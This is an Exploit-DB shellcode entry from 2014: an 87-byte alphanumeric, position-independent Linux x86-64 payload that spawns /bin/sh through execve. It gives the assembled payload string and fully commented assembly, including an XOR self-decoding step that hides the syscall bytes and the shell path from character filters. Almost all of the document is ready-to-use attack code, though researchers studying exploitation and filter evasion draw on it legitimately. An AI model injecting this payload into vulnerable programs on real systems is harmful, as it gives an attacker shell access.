Linux/x64 - execve("/bin/sh\0",NULL,NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)

EDB-ID:

35205

CVE:

N/A




Platform:

Linux_x86-64

Date:

2014-11-10


#Title: Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)
#Author: Breaking.Technology
#Date: 06 November 2014
#Vendor Homepage: http://breaking.technology
#Version: x86-64 platforms
#Classification: 64 bit shellcode
#Shellcode: http://breaking.technology/shellcode/alpha64-binsh.txt

#    Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)
# This shellcode will successfully execute every time as long as it is returned to.
#                        (c) 2014 Breaking Technology, Inc.                        
#                           http://breaking.technology/                            
#
# Assembled (87 bytes): 
# XXj0TYX45Pk13VX40473At1At1qu1qv1qwHcyt14yH34yhj5XVX1FK1FSH3FOPTj0X40PP4u4NZ4jWSEW18EF0V
#
# Assembly: 
# user@host $ as alpha64-binsh.s -o alpha64-binsh.o ; strings alpha64-binsh.o
.section .data
.section .text
.globl _start

_start:                     # "XX"
  pop %rax                  # 'X' add $0x8, %rsp  ; so we dont overwrite the return pointer
  pop %rax                  # 'X' add $0x8, %rsp  ; so we dont overwrite the return pointer

prepare_ff:                 # "j0TYX45Pk13"
  push $0x30                # 'j0'
  push %rsp                 # 'T'
  pop %rcx                  # 'Y'   %rcx points to $0x30
  pop %rax                  # 'X'   %rax   = 0x30
  xor $0x35, %al            # '45'  %rax   = 0x05
  push %rax                 # 'P'   (%rcx) = 0x05
  imul $0x33, (%rcx), %esi  # 'k13' %esi = 0x000000ff

prepare_f8:                 # "VX4047"
  # mov %rsi, %rax
  push %rsi                 # 'V'  
  pop %rax                  # 'X'    %rax = %rsi = 0x000000ff

  # mov $0xf8, %al
  xor $0x30, %al            # '40'
  xor $0x37, %al            # '47'   %rax = 0x000000f8

write_negative_8:           # "3At1At1qu1qv1qw"
  # mov %eax, 0x74(%rcx)
  xor 0x74(%rcx), %eax      # '3At'
  xor %eax, 0x74(%rcx)      # '1At' 0xf8

  # mov %sil, 0x75 - 0x77 + rcx
  xor %esi, 0x75(%rcx)      # '1qu' 0xff
  xor %esi, 0x76(%rcx)      # '1qv' 0xff
  xor %esi, 0x77(%rcx)      # '1qw' 0xff

  # -8 is now on the stack as a 32-bit dword
  # at 0x74(%rcx)

read_negative_8:            # "Hcyt"
  # move long (dword) to signed quadword
  # mov -8, %rdi
  movslq 0x74(%rcx), %rdi   # 'Hcyt' %rdi is now -0x8 ( 0xfffffffffffffff8 )

get_return_pointer:         # "14yH34y"
  # mov -0x10(%rcx), %rsi   <--- THIS IS OUR RETURN POINTER / LOCATION OF short_pc_rsi
  # OR IN DECIMAL:
  # mov -16(%rcx), %rsi
  xor %esi, (%rcx, %rdi, 2) # '14y'
  xor (%rcx, %rdi, 2), %rsi # 'H34y'

prepare_key:                # "hj5XVX"
  # put the xor key into %eax
  push $0x5658356a          # 'hj5XV' pushed backwards because x86 stack.
  pop %rax                  # 'X'

decode_encoded_code:        # "1FK"
  xor %eax, 0x4b(%rsi)      # '1FK'  encoded_code       ; pops & syscall decoded

decode_encoded_data:        # "1FSH3FO"
  xor %eax, 0x53(%rsi)      # '1FS'  encoded_data + 4  ; "/sh\0" decoded
  xor 0x4f(%rsi), %rax      # 'H3FO' encoded_data      ; "/bin/sh\0" now in %rax

begin_stack_setup:          # "PT"
  push %rax                 # 'P' push "/bin/sh\0"
  push %rsp                 # 'T' push pointer to /bin/sh
  

zero_rax:                   # "j0X40"
  # xor %rax, %rax
  push $0x30                # 'j0'
  pop %rax                  # 'X'
  xor $0x30, %al            # '40' %rax is NULL

end_stack_setup:            # "PP"
  push %rax                 # 'P' push NULL
  push %rax                 # 'P' push NULL


mov_3b_al:                  # "4u4N"
  # mov $0x3b, %al
  xor $0x75, %al            # '4u'
  xor $0x4e, %al            # '4N' %al = 0x4e xor 0x75 =  $0x3b
                            #            this is for syscall ^ 
begin_stack_run:            # "Z"
  pop %rdx                  # 'Z' mov $0x00, %rdx ; %rdx = NULL


encoded_code:               # "4jWS" 
                            #  0x34 0x6a 0x57 0x53 
                            # AFTER XOR MAGIC:
  .byte 0x34                # "\x5e" pop %rsi     ; %rsi = NULL
  .byte 0x6a                # "\x5f" pop %rdi     ; %rdi = pointer to "/bin/sh\0"
  .byte 0x57                # "\x0f"
  .byte 0x53                # "\x05" syscall      ; execve("/bin/sh\0",NULL,NULL);

  # syscall(%rax) = function(%rdi,%rsi,%rdx);
  # syscall(0x3b) = execve("/bin/sh\0",NULL,NULL);


encoded_data:               # "EW18EF0V" turns into "/bin/sh\0"
                            # 0x45 0x57 0x31 0x38 0x45 0x46 0x30 0x56
                            # AFTER XOR MAGIC:
  .byte 0x45                #  /
  .byte 0x57                #  b
  .byte 0x31                #  i
  .byte 0x38                #  n
  .byte 0x45                #  /
  .byte 0x46                #  s
  .byte 0x30                #  h
  .byte 0x56                #  \0